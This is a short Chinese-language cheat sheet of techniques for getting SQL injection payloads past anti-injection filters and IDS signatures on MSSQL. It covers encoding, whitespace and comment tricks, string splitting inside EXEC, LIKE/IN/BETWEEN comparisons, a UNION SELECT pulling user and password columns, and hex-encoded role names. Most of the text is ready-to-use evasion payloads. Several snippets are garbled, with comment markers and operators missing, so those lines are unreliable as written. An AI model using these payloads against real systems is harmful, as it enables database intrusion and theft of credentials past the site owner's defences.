绕过防注入

积分值

1、运用编码技术绕过
如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

2、通过空格绕过
如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如
or' swords' =‘swords'，由于mssql的松散性，我们可以把or 'swords' 之间的空格去掉，并不影响运行。

3、运用字符串判断代替
用经典的or 1=1判断绕过,如or 'swords' ='swords'，这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or 'swords' = N' swords' ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过
效果值得考证，但毕竟是一种方法。如or 'swords' =‘sw' +' ords' ；EXEC(‘IN' +' SERT INTO '+' …..' )

6、通过LIKE绕过
以前怎么就没想到呢？如or'swords' LIKE 'sw'！！！显然可以很轻松的绕过“=”“”的限制……

7、通过IN绕过
与上面的LIKE的思路差不多,如or 'swords' IN ('swords')

8、通过BETWEEN绕过
如or 'swords' BETWEEN 'rw' AND 'tw'

9、通过或者绕过
or 'swords'  'sw'
or 'swords'  'tw'
or 13
……

10、运用注释语句绕过
用代替空格，如：UNION  Select user，pwd，from tbluser
用分割敏感词，如：U NION  SE LECT user，pwd from tbluser
smxiaoqiang.cn
11、用HEX绕过，一般的IDS都无法检测出来
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)